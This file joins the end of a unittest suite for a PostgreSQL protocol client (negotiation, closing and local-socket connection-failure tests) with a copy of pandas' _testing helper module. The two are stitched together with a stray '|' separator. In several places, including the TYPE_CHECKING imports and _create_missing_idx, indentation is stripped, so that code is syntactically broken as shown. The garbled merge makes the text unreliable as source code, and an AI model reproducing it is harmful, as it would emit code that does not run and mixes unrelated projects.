			self.assertEqual(x.state, x3.Complete)
			rec = []
			for y in x.completed:
				for z in y[1]:
					# Raw bytes in the completed stream are COPY payloads.
					if type(z) is type(b''):
						z = e3.CopyData(z)
					rec.append(z)
			self.assertEqual(xres, tuple(rec))
	def testClosing(self):
		# Closing sends the disconnect message and flags a fatal 08003 error.
		c = x3.Closing()
		self.assertEqual(c.messages, (e3.DisconnectMessage,))
		c.state[1]()
		self.assertEqual(c.fatal, True)
		self.assertEqual(c.error_message.__class__, e3.ClientError)
		self.assertEqual(c.error_message[b'C'], '08003')
	def testNegotiation(self):
		# simple successful run
		n = x3.Negotiation({}, b'')
		n.state[1]()
		n.state[1](
			pairs(
				e3.Notice(((b'M', b"foobar"),)),
				e3.Authentication(e3.AuthRequest_OK, b''),
				e3.KillInformation(0,0),
				e3.ShowOption(b'name', b'val'),
				e3.Ready(b'I'),
			)
		)
		self.assertEqual(n.state, x3.Complete)
		self.assertEqual(n.last_ready.xact_state, b'I')
		# no killinfo.. should cause protocol error...
		n = x3.Negotiation({}, b'')
		n.state[1]()
		n.state[1](
			pairs(
				e3.Notice(((b'M', b"foobar"),)),
				e3.Authentication(e3.AuthRequest_OK, b''),
				e3.ShowOption(b'name', b'val'),
				e3.Ready(b'I'),
			)
		)
		self.assertEqual(n.state, x3.Complete)
		self.assertEqual(n.last_ready, None)
		self.assertEqual(n.error_message[b'C'], '08P01')
		# killinfo twice.. must cause protocol error...
		n = x3.Negotiation({}, b'')
		n.state[1]()
		n.state[1](
			pairs(
				e3.Notice(((b'M', b"foobar"),)),
				e3.Authentication(e3.AuthRequest_OK, b''),
				e3.ShowOption(b'name', b'val'),
				e3.KillInformation(0,0),
				e3.KillInformation(0,0),
				e3.Ready(b'I'),
			)
		)
		self.assertEqual(n.state, x3.Complete)
		self.assertEqual(n.last_ready, None)
		self.assertEqual(n.error_message[b'C'], '08P01')
		# start with ready message..
		n = x3.Negotiation({}, b'')
		n.state[1]()
		n.state[1](
			pairs(
				e3.Notice(((b'M', b"foobar"),)),
				e3.Ready(b'I'),
				e3.Authentication(e3.AuthRequest_OK, b''),
				e3.ShowOption(b'name', b'val'),
			)
		)
		self.assertEqual(n.state, x3.Complete)
		self.assertEqual(n.last_ready, None)
		self.assertEqual(n.error_message[b'C'], '08P01')
		# unsupported authreq
		n = x3.Negotiation({}, b'')
		n.state[1]()
		n.state[1](
			pairs(
				e3.Authentication(255, b''),
			)
		)
		self.assertEqual(n.state, x3.Complete)
		self.assertEqual(n.last_ready, None)
		self.assertEqual(n.error_message[b'C'], '--AUT')
	def testInstructionAsynchook(self):
		# Asynchronous messages (Notice/Notify/ShowOption) must be handed to
		# the asynchook exactly once each.
		l = []
		def hook(data):
			l.append(data)
		x = x3.Instruction([
			e3.Query(b"NOTHING")
		], asynchook = hook)
		a1 = e3.Notice(((b'M', b"m1"),))
		a2 = e3.Notify(0, b'relation', b'parameter')
		a3 = e3.ShowOption(b'optname', b'optval')
		# "send" the query message
		x.state[1]()
		# "receive" the tuple
		x.state[1]([(a1.type, a1.serialize()),])
		a2l = [(a2.type, a2.serialize()),]
		x.state[1](a2l)
		# validate that the hook is not fed twice because
		# it's the exact same message set. (later assertion will validate)
		x.state[1](a2l)
		x.state[1]([(a3.type, a3.serialize()),])
		# we only care about validating that l got everything.
		self.assertEqual([a1,a2,a3], l)
		self.assertEqual(x.state[0], x3.Receiving)
		# validate that the asynchook exception is trapped.
		class Nee(Exception):
			pass
		def ehook(msg):
			raise Nee("this should **not** be part of the summary")
		x = x3.Instruction([
			e3.Query(b"NOTHING")
		], asynchook = ehook)
		a1 = e3.Notice(((b'M', b"m1"),))
		x.state[1]()
		import sys
		v = None
		def exchook(typ, val, tb):
			nonlocal v
			v = val
		seh = sys.excepthook
		sys.excepthook = exchook
		# we only care about validating that the exchook got called.
		x.state[1]([(a1.type, a1.serialize())])
		sys.excepthook = seh
		self.assertTrue(isinstance(v, Nee))
class test_client3(unittest.TestCase):
	# Connection-level failure modes against a throwaway local server socket.
	def test_timeout(self):
		# Server never accept()s, so connect(timeout=1) must fail fatally
		# while still inside the Negotiation transaction.
		portnum = find_available_port()
		servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		with servsock:
			servsock.bind(('localhost', portnum))
			pc = c3.Connection(
				SocketFactory(
					(socket.AF_INET, socket.SOCK_STREAM),
					('localhost', portnum)
				),
				{}
			)
			pc.connect(timeout = 1)
			try:
				self.assertEqual(pc.xact.fatal, True)
				self.assertEqual(pc.xact.__class__, x3.Negotiation)
			finally:
				if pc.socket is not None:
					pc.socket.close()
	def test_SSL_failure(self):
		# Server answers the SSL request with b'S' then garbage; the client
		# must record a fatal ClientError with the underlying exception.
		portnum = find_available_port()
		servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		with servsock:
			servsock.bind(('localhost', portnum))
			pc = c3.Connection(
				SocketFactory(
					(socket.AF_INET, socket.SOCK_STREAM),
					('localhost', portnum)
				),
				{}
			)
			exc = None
			servsock.listen(1)
			def client_thread():
				pc.connect(ssl = True)
			client = Thread(target = client_thread)
			try:
				client.start()
				c, addr = servsock.accept()
				with c:
					c.send(b'S')
					c.sendall(b'0000000000000000000000')
					c.recv(1024)
					c.close()
				client.join()
			finally:
				if pc.socket is not None:
					pc.socket.close()
			self.assertEqual(pc.xact.fatal, True)
			self.assertEqual(pc.xact.__class__, x3.Negotiation)
			self.assertEqual(pc.xact.error_message.__class__, e3.ClientError)
			self.assertTrue(hasattr(pc.xact, 'exception'))
	def test_bad_negotiation(self):
		# Server closes the connection immediately after the startup packet;
		# expect a fatal 08006 (connection failure) ClientError.
		portnum = find_available_port()
		servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		servsock.bind(('localhost', portnum))
		pc = c3.Connection(
			SocketFactory(
				(socket.AF_INET, socket.SOCK_STREAM),
				('localhost', portnum)
			),
			{}
		)
		exc = None
		servsock.listen(1)
		def client_thread():
			pc.connect()
		client = Thread(target = client_thread)
		try:
			client.start()
			c, addr = servsock.accept()
			try:
				c.recv(1024)
			finally:
				c.close()
			time.sleep(0.25)
			client.join()
			# NOTE(review): servsock is closed here and again in the finally
			# clause; the double close is redundant but harmless.
			servsock.close()
			self.assertEqual(pc.xact.fatal, True)
			self.assertEqual(pc.xact.__class__, x3.Negotiation)
			self.assertEqual(pc.xact.error_message.__class__, e3.ClientError)
			self.assertEqual(pc.xact.error_message[b'C'], '08006')
		finally:
			servsock.close()
			if pc.socket is not None:
				pc.socket.close()
if __name__ == '__main__':
	# Run the suite against a synthetic module holding this file's globals,
	# so unittest.main discovers the test classes defined above.
	from types import ModuleType
	this = ModuleType("this")
	this.__dict__.update(globals())
	try:
		unittest.main(this)
	finally:
		# Force a collection pass so lingering sockets/threads are reaped.
		import gc
		gc.collect()
|
__init__.py | from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import (
DatetimeArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
# Default dimensions for generated test frames (rows / columns).
_N = 30
_K = 4
# Dtype groups used to parametrize tests across numpy and pandas
# extension ("EA") dtypes.
UNSIGNED_INT_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
    ALL_REAL_DTYPES
    + COMPLEX_DTYPES
    + STRING_DTYPES
    + DATETIME64_DTYPES
    + TIMEDELTA64_DTYPES
    + BOOL_DTYPES
    + OBJECT_DTYPES
    + BYTES_DTYPES
)
# Every scalar pandas treats as missing, for NA-handling tests.
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
    """Enable 'always' filters for the testing-mode warning categories
    when the PANDAS_TESTING_MODE environment variable requests it."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        for warning_cls in _testing_mode_warnings:
            warnings.simplefilter("always", warning_cls)
def reset_testing_mode():
    """Silence the warning categories enabled by set_testing_mode()."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        for warning_cls in _testing_mode_warnings:
            warnings.simplefilter("ignore", warning_cls)
# Apply the environment-driven filters at import time.
set_testing_mode()
def reset_display_options():
    """Restore every pandas ``display.*`` option to its default value."""
    pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
    """
    True when arr1 and arr2 hold the same set of unique elements.
    """
    unique_left = frozenset(arr1)
    unique_right = frozenset(arr2)
    return unique_left == unique_right
def box_expected(expected, box_cls, transpose=True):
    """
    Helper function to wrap the expected output of a test in a given box_class.
    Parameters
    ----------
    expected : np.ndarray, Index, Series
    box_cls : {Index, Series, DataFrame}
    Returns
    -------
    subclass of box_cls
    """
    # Dispatch on the identity of the requested container class.
    if box_cls is pd.array:
        boxed = pd.array(expected)
    elif box_cls is Index:
        boxed = Index(expected)
    elif box_cls is Series:
        boxed = Series(expected)
    elif box_cls is DataFrame:
        boxed = Series(expected).to_frame()
        if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
            # not a single-column, in order to operate against non-DataFrame
            # vectors of the same length. But convert to two rows to avoid
            # single-row special cases in datetime arithmetic
            boxed = pd.concat([boxed.T] * 2, ignore_index=True)
    elif box_cls is PeriodArray:
        # the PeriodArray constructor is not as flexible as period_array
        boxed = period_array(expected)
    elif box_cls is DatetimeArray:
        boxed = DatetimeArray(expected)
    elif box_cls is TimedeltaArray:
        boxed = TimedeltaArray(expected)
    elif box_cls is np.ndarray:
        boxed = np.array(expected)
    elif box_cls is to_array:
        boxed = to_array(expected)
    else:
        raise NotImplementedError(box_cls)
    return boxed
def to_array(obj):
    # Temporary shim until pd.array covers these cases: map obj to the
    # matching pandas extension array, falling back to a numpy ndarray.
    dtype = getattr(obj, "dtype", None)
    if is_period_dtype(dtype):
        return period_array(obj)
    if is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
        return DatetimeArray._from_sequence(obj)
    if is_timedelta64_dtype(dtype):
        return TimedeltaArray._from_sequence(obj)
    return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
    """Return the first ``k`` uppercase ASCII letters as a single string."""
    alphabet = string.ascii_uppercase
    return alphabet[:k]
# make index
def makeStringIndex(k=10, name=None):
    """Index of ``k`` random 10-character ASCII strings."""
    values = rands_array(nchars=10, size=k)
    return Index(values, name=name)
def makeUnicodeIndex(k=10, name=None):
    """Return an Index of k random 10-character unicode strings."""
    return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
    """Return a length-k CategoricalIndex cycling over n random string categories."""
    categories = rands_array(nchars=4, size=n)
    codes = np.arange(k) % n
    cat = Categorical.from_codes(codes, categories=categories)
    return CategoricalIndex(cat, name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
    """Return an IntervalIndex of k equal-width intervals spanning [0, 100]."""
    breaks = np.linspace(0, 100, num=k + 1)
    return IntervalIndex.from_breaks(breaks, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
    """Return a boolean Index of length k: [True] for k == 1, else [False, True, False, ...]."""
    if k == 1:
        values = [True]
    else:
        values = [False, True] + [False] * (k - 2)
    return Index(values, name=name)
def makeIntIndex(k=10, name=None):
    """Return an integer Index of 0..k-1."""
    return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
    """Return an Index of k values starting at 2**63 (forces unsigned range)."""
    return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
    """Return a RangeIndex over 0..k-1 with step 1."""
    return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
    """Return a float Index of k sorted random values, shifted and randomly scaled."""
    # draw order matches the original: k samples, one shift sample, one randint
    samples = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
    scale = 10 ** np.random.randint(0, 9)
    return Index(samples * scale, name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
    """Return a DatetimeIndex of k periods at *freq* starting from 2000-01-01."""
    start = datetime(2000, 1, 1)
    dates = bdate_range(start, periods=k, freq=freq, name=name)
    return DatetimeIndex(dates, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
    """Return a TimedeltaIndex of k periods at *freq*, starting from "1 day"."""
    return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
    """Return a PeriodIndex of k business-day periods starting at 2000-01-01."""
    start = datetime(2000, 1, 1)
    return pd.period_range(start=start, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
    """Return a fixed 2x2 product MultiIndex (length 4).

    NOTE(review): parameter ``k`` is accepted but unused here — the result is
    always length 4; confirm whether callers rely on that.
    """
    return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
# Pool of first names used as the random "name" column in _make_timeseries.
_names = [
    "Alice",
    "Bob",
    "Charlie",
    "Dan",
    "Edith",
    "Frank",
    "George",
    "Hannah",
    "Ingrid",
    "Jerry",
    "Kevin",
    "Laura",
    "Michael",
    "Norbert",
    "Oliver",
    "Patricia",
    "Quinn",
    "Ray",
    "Sarah",
    "Tim",
    "Ursula",
    "Victor",
    "Wendy",
    "Xavier",
    "Yvonne",
    "Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
    """
    Make a DataFrame with a DatetimeIndex

    Parameters
    ----------
    start : str or Timestamp, default "2000-01-01"
        The start of the index. Passed to date_range with `freq`.
    end : str or Timestamp, default "2000-12-31"
        The end of the index. Passed to date_range with `freq`.
    freq : str or Freq
        The frequency to use for the DatetimeIndex
    seed : int, optional
        The random state seed.

    Returns
    -------
    DataFrame
        Indexed by "timestamp", with columns:

        * name : object dtype with string names
        * id : int dtype with
        * x, y : float dtype

    Examples
    --------
    >>> _make_timeseries()
                  id    name         x         y
    timestamp
    2000-01-01   982   Frank  0.031261  0.986727
    2000-01-02  1025   Edith -0.086358 -0.032920
    2000-01-03   982   Edith  0.473177  0.298654
    2000-01-04  1009   Sarah  0.534344 -0.750377
    2000-01-05   963   Zelda -0.271573  0.054424
    ...          ...     ...       ...       ...
    2000-12-27   980  Ingrid -0.132333 -0.422195
    2000-12-28   972   Frank -0.376007 -0.298687
    2000-12-29  1009  Ursula -0.865047 -0.503133
    2000-12-30  1000  Hannah -0.063757 -0.507336
    2000-12-31   972     Tim -0.869120  0.531685
    """
    index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
    n = len(index)
    state = np.random.RandomState(seed)
    columns = {
        "name": state.choice(_names, size=n),
        "id": state.poisson(1000, size=n),
        "x": state.rand(n) * 2 - 1,
        "y": state.rand(n) * 2 - 1,
    }
    df = DataFrame(columns, index=index, columns=sorted(columns))
    # drop the final row when the range landed exactly on `end`, so the
    # result is half-open on the right
    if df.index[-1] == end:
        df = df.iloc[:-1]
    return df
def index_subclass_makers_generator():
    """Yield the maker functions for the Index subclasses in this module."""
    yield from (
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
        makeMultiIndex,
    )
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
    """
    Generator which can be iterated over to get instances of all the classes
    which represent time-series.

    Parameters
    ----------
    k: length of each of the index instances
    """
    for maker in (makeDateIndex, makePeriodIndex, makeTimedeltaIndex):
        yield maker(k=k)
# make series
def makeFloatSeries(name=None):
    """Return a Series of _N random floats over a random string index."""
    idx = makeStringIndex(_N)
    return Series(np.random.randn(_N), index=idx, name=name)
def makeStringSeries(name=None):
    """Return a Series of _N random floats over a random string index."""
    idx = makeStringIndex(_N)
    return Series(np.random.randn(_N), index=idx, name=name)
def makeObjectSeries(name=None):
    """Return a Series of object dtype holding random strings."""
    values = Index(makeStringIndex(_N), dtype=object)
    idx = makeStringIndex(_N)
    return Series(values, index=idx, name=name)
def getSeriesData():
    """Return a dict of _K random-float Series sharing one random string index."""
    shared_index = makeStringIndex(_N)
    return {col: Series(np.random.randn(_N), index=shared_index) for col in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
    """Return a Series of random floats over a date index of *nper* periods."""
    if nper is None:
        nper = _N
    idx = makeDateIndex(nper, freq=freq)
    return Series(np.random.randn(nper), index=idx, name=name)
def makePeriodSeries(nper=None, name=None):
    """Return a Series of random floats over a PeriodIndex of *nper* periods."""
    if nper is None:
        nper = _N
    idx = makePeriodIndex(nper)
    return Series(np.random.randn(nper), index=idx, name=name)
def getTimeSeriesData(nper=None, freq="B"):
    """Return a dict of _K random time Series keyed by column letter."""
    return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
    """Return a dict of _K random period Series keyed by column letter."""
    return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
    """Return a DataFrame of random floats over a date index."""
    return DataFrame(getTimeSeriesData(nper, freq))
def makeDataFrame() -> DataFrame:
    """Return a DataFrame of random floats: _N rows, _K string-labelled columns."""
    return DataFrame(getSeriesData())
def getMixedTypeDict():
    """Return (index, data) for a small mixed-dtype frame: floats, strings, dates."""
    index = Index(list("abcde"))
    data = {
        "A": [0.0, 1.0, 2.0, 3.0, 4.0],
        "B": [0.0, 1.0, 0.0, 1.0, 0.0],
        "C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
        "D": bdate_range("1/1/2009", periods=5),
    }
    return index, data
def makeMixedDataFrame():
    """Return a 5-row DataFrame with float, string, and datetime columns."""
    return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
    """Return a DataFrame of random floats over a PeriodIndex."""
    return DataFrame(getPeriodData(nper))
def makeCustomIndex(
    nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
    """
    Create an index/multindex with given dimensions, levels, names, etc'

    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
       names, if false will use no names, if a list is given, the name of
       each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
       label will repeated at the corresponding level, you can specify just
       the first few, the rest will use the default ndupe_l of 1.
       len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.
    """
    if ndupe_l is None:
        ndupe_l = [1] * nlevels
    assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    # BUG FIX: compare lengths with ==, not `is`; integer identity is an
    # implementation detail (small-int caching) and not guaranteed.
    assert names is None or names is False or names is True or len(names) == nlevels
    assert idx_type is None or (
        idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
    )
    if names is True:
        # build default names
        names = [prefix + str(i) for i in range(nlevels)]
    if names is False:
        # pass None to index constructor for no name
        names = None
    # make singleton case uniform
    if isinstance(names, str) and nlevels == 1:
        names = [names]
    # specific 1D index type requested?
    idx_func_dict: dict[str, Callable[..., Index]] = {
        "i": makeIntIndex,
        "f": makeFloatIndex,
        "s": makeStringIndex,
        "u": makeUnicodeIndex,
        "dt": makeDateIndex,
        "td": makeTimedeltaIndex,
        "p": makePeriodIndex,
    }
    idx_func = idx_func_dict.get(idx_type)
    if idx_func:
        idx = idx_func(nentries)
        # but we need to fill in the name
        if names:
            idx.name = names[0]
        return idx
    elif idx_type is not None:
        raise ValueError(
            f"{repr(idx_type)} is not a legal value for `idx_type`, "
            "use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
        )
    if len(ndupe_l) < nlevels:
        ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
    assert len(ndupe_l) == nlevels
    assert all(x > 0 for x in ndupe_l)

    # hoisted out of the per-level loop: the import and the sort key are
    # loop-invariant (previously both were re-created every iteration)
    import re

    def keyfunc(x):
        # sort key: the numeric (level, group) components embedded in a label
        numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
        return [int(num) for num in numeric_tuple]

    list_of_lists = []
    for i in range(nlevels):
        # build a list of lists to create the index from
        div_factor = nentries // ndupe_l[i] + 1
        cnt: Counter[str] = collections.Counter()
        for j in range(div_factor):
            label = f"{prefix}_l{i}_g{j}"
            cnt[label] = ndupe_l[i]
        # cute Counter trick
        result = sorted(cnt.elements(), key=keyfunc)[:nentries]
        list_of_lists.append(result)
    tuples = list(zip(*list_of_lists))
    # convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        # NOTE(review): this path indexes names[0] and so assumes names is a
        # list when nentries == 1 — confirm callers never pass names=None here
        index = Index(tuples[0], name=names[0])
    elif nlevels == 1:
        name = None if names is None else names[0]
        index = Index((x[0] for x in tuples), name=name)
    else:
        index = MultiIndex.from_tuples(tuples, names=names)
    return index
def makeCustomDataframe(
    nrows,
    ncols,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Create a DataFrame using supplied parameters.

    Parameters
    ----------
    nrows, ncols - number of data rows/cols
    c_idx_names, idx_names - False/True/list of strings, yields No names ,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels ==1.
    c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
    r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which return the data value
        at that position, the default generator used yields values of the form
        "RxCy" based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
        of duplicates for each label at a given level of the corresponding
        index. The default `None` value produces a multiplicity of 1 across
        all levels, i.e. a unique index. Will accept a partial list of length
        N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
        nrows/ncol, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
        have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" create a datetime index.
        "td" create a timedelta index.
        if unspecified, string labels will be generated.

    Examples
    --------
    # 5 row, 3 columns, default names on both, single index on both axis
    >> makeCustomDataframe(5,3)
    # make the data a random int between 1 and 100
    >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
    # 2-level multiindex on rows with each label duplicated
    # twice on first level, default names on both axis, single
    # index on both axis
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
    # DatetimeIndex on row, index with unicode labels on columns
    # no names on either axis
    >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
                             r_idx_type="dt",c_idx_type="u")
    # 4-level multindex on rows with names provided, 2-level multindex
    # on columns with default labels and default names.
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
                             r_idx_names=["FEE","FIH","FOH","FUM"],
                             c_idx_nlevels=2)
    >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
    """
    # a typed index can only be requested for a single-level axis
    assert c_idx_nlevels > 0
    assert r_idx_nlevels > 0
    assert r_idx_type is None or (
        r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
    )
    assert c_idx_type is None or (
        c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
    )
    # both axes are built by makeCustomIndex with axis-specific prefixes
    columns = makeCustomIndex(
        ncols,
        nlevels=c_idx_nlevels,
        prefix="C",
        names=c_idx_names,
        ndupe_l=c_ndupe_l,
        idx_type=c_idx_type,
    )
    index = makeCustomIndex(
        nrows,
        nlevels=r_idx_nlevels,
        prefix="R",
        names=r_idx_names,
        ndupe_l=r_ndupe_l,
        idx_type=r_idx_type,
    )
    # by default, generate data based on location
    if data_gen_f is None:
        data_gen_f = lambda r, c: f"R{r}C{c}"
    data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
    return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
    """Return makeDataFrame() output with ~(1 - density) of its cells set to NaN."""
    frame = makeDataFrame()
    rows, cols = _create_missing_idx(
        *frame.shape, density=density, random_state=random_state
    )
    frame.values[rows, cols] = np.nan
    return frame
def test_parallel(num_threads=2, kwargs_list=None):
    """
    Decorator to run the same function multiple times in parallel.

    Parameters
    ----------
    num_threads : int, optional
        The number of times the function is run in parallel.
    kwargs_list : list of dicts, optional
        The list of kwargs to update original
        function kwargs on different threads.

    Notes
    -----
    This decorator does not pass the return value of the decorated function.

    Original from scikit-image:
    https://github.com/scikit-image/scikit-image/pull/1519
    """
    assert num_threads > 0
    if kwargs_list is not None:
        assert len(kwargs_list) == num_threads
    import threading

    def wrapper(func):
        @wraps(func)
        def inner(*args, **kwargs):
            # build one kwargs dict per thread; without overrides every
            # thread shares the original kwargs (matching prior behavior)
            if kwargs_list is not None:
                per_thread = [dict(kwargs, **extra) for extra in kwargs_list]
            else:
                per_thread = [kwargs] * num_threads
            workers = [
                threading.Thread(target=func, args=args, kwargs=per_thread[i])
                for i in range(num_threads)
            ]
            for t in workers:
                t.start()
            for t in workers:
                t.join()

        return inner

    return wrapper
class SubclassedSeries(Series):
    """Series subclass used to test that metadata propagates through ops."""

    # "testattr" is propagated to results alongside the standard "name"
    _metadata = ["testattr", "name"]

    @property
    def _constructor(self):
        # keep the subclass through Series-returning operations
        return SubclassedSeries

    @property
    def _constructor_expanddim(self):
        # dimension-raising ops (e.g. to_frame) yield the paired frame subclass
        return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
